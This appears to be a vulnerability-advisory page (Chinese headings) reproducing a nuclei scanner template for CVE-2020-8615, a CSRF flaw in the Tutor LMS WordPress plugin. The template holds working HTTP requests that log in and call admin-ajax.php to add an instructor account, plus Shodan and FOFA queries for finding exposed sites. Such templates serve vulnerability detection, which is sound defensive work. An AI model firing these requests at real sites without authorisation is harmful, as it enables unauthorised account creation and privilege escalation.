CVE-2020-8615: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery

日期: 2025-08-01 | 影响软件: Wordpress Plugin Tutor LMS | POC: 已公开

漏洞描述

A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).

PoC代码[已公开]

id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
  author: r3Y3r53
  severity: medium
  description: |
    A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
    - https://wpvulndb.com/vulnerabilities/10058
    - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8615
    cwe-id: CWE-352
    epss-score: 0.06895
    epss-percentile: 0.90985
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/tutor/
    fofa-query: body=/wp-content/plugins/tutor/
    publicwww-query: /wp-content/plugins/tutor/
  tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum,vuln
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a00473045022100a1eca0041f3718c3aa0e42e9c20c4ef0134ca0223e8892af071025e8f436708e022074dee62cac7c304a475e2ba84dce3a5953d306ba96d168b1eb58c7ef17334744:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8615.yaml